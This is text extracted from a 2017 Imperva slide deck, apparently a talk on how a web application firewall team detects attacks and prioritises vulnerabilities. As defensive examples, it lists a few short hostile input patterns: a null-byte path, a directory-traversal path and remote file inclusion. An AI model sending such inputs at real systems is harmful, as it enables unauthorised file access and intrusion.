Keeping it SafeBen Herzberg

Security Research Group Manager, Imperva

@KernelXSS @imperva

2

> ben.childNodes.length<· 2> ben.history<· [“PT”,”Dev”] > ben.employer<· “Imperva”> ben.positionX<· “Research Group Manager”> ben.social<· {“TWT”: “@KernelXSS”, “LNK”: “Ben Herzberg”}

© 2017 Imperva, Inc. All rights reserved.

Web Application Security

© 2017 Imperva, Inc. All rights reserved.

Our “Ground Rules”

As little config as possible

Focus on low FPs

Use our CDN to cover more AVs

© 2017 Imperva, Inc. All rights reserved.

Being app agnostic…

© 2017 Imperva, Inc. All rights reserved.

Being app agnostic…

Example #1: SQL Injection

Queries sent over an application

Pseudo-SQL

“Close Calls”

© 2017 Imperva, Inc. All rights reserved.

Being app agnostic…

Example #2: Cross-Site Scripting

HTML sent as part of request

Javascript sent as part of request

Javascript being… Javascript…

© 2017 Imperva, Inc. All rights reserved.

Being app agnostic…

Example #4: MISC…

GET + Content-Type + Content-Length

/%00/demo/welcome

src=../../../../windows/bannerWindow/a.jpg

PHP in RFI

© 2017 Imperva, Inc. All rights reserved.

Platforms & Frameworks

© 2017 Imperva, Inc. All rights reserved.

So what do we do?

© 2017 Imperva, Inc. All rights reserved.

Automate all of the things

© 2017 Imperva, Inc. All rights reserved.

Find new stuff

TRAP

ASSESS

BLOCK

REPEAT© 2017 Imperva, Inc. All rights reserved.

Find new stuff

Algorithmics

(ML)

© 2017 Imperva, Inc. All rights reserved.

Vulnerabilities Tracking

© 2017 Imperva, Inc. All rights reserved.

Why?

Create a clear process for Vulnerabilities Management

Give our customers an efficient & prioritised vulnerability response procedure

Unified process

© 2017 Imperva, Inc. All rights reserved.

New VR+EF: Scoping

CVSS>9.0 NO AUTH+ = HPC

WEB REMOTE

+ +

10+

TWEETS = HPC

CVSS>7.04+

TWEETS

=

REGULAR+ HAS

EXPLOITORCVSS>8.0

=REGULAR

…

SEC

INTEL. = HPC

© 2017 Imperva, Inc. All rights reserved.

Business Days

HPC REGULAR+

OOS

OOTB

Followup

Mitigation Needed

Emergency Feed

© 2017 Imperva, Inc. All rights reserved.

Weekends

HPC

OOS

OOTB

Followup

Mitigation Needed

Emergency Feed

© 2017 Imperva, Inc. All rights reserved.

Some of our projects…

© 2017 Imperva, Inc. All rights reserved.

TMI

© 2017 Imperva, Inc. All rights reserved.

Antivirus

1987 1992

Firewall

1999

WAF

IPS

NOW

© 2017 Imperva, Inc. All rights reserved.

© 2017 Imperva, Inc. All rights reserved.

© 2017 Imperva, Inc. All rights reserved.

Attack Analytics

© 2017 Imperva, Inc. All rights reserved.

Putting things in context…

© 2017 Imperva, Inc. All rights reserved.

IP Reputation

© 2017 Imperva, Inc. All rights reserved.

© 2017 Imperva, Inc. All rights reserved.

© 2017 Imperva, Inc. All rights reserved.

Automated Attacks

© 2017 Imperva, Inc. All rights reserved.

30

@KernelXSS, @imperva

Thank You!

Let’s Talk!linkedin.com/in/sysadmin

ben.herzberg@imperva.com

© 2017 Imperva, Inc. All rights reserved.